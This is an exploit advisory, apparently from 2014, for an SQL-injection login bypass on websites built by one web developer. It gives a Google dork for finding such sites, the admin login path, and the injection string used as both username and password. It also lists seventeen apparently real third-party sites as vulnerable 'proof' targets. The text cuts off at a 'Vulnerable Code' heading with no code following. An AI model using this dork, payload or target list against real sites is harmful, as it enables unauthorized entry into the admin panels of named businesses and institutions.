######################################### # Exploit Title : Developed by Madss Software Solution Login page Bypass Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://madsssoftwaresolution.com # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd." # # Date: 2014/4/13 # ########################################### # # Exploit : Login page bypass # # Location : [Target]/admin/login.php # # Username : '=' 'or' # # Password : '=' 'or' ###################### # Proof: # # http://www.artistmahendradubey.com/admin/login.php # # http://www.sardarenterprises.com/admin/login.php # # http://www.amritaorganic.com/admin/login.php # # http://www.kvmcpandhana.com/admin/login.php # # http://www.vikatsoft.com/admin/login.php # # http://www.narulamathsmagic.com/admin/login.php # # http://www.dayodayathirthborgaon.com/admin/login.php # # http://www.chhatimata.com/admin/login.php # # http://www.chhatimata.com/admin/login.php # # http://www.mnlawcollegekhandwa.com/admin/login.php # # http://www.guptashrikhandwa.com/admin/login.php # # http://www.apnagwalior.com/admin/login.php # # http://www.apnamorena.com/admin/login.php # # http://www.djpsbhikangaon.com/admin/login.php # # http://www.acmecoachingbhikangaon.com/admin/login.php # # http://www.sainisportsacademy.com/admin/login.php # # http://www.apnaburhanpur.com/admin/login.php # ############################################ Vulnerable Code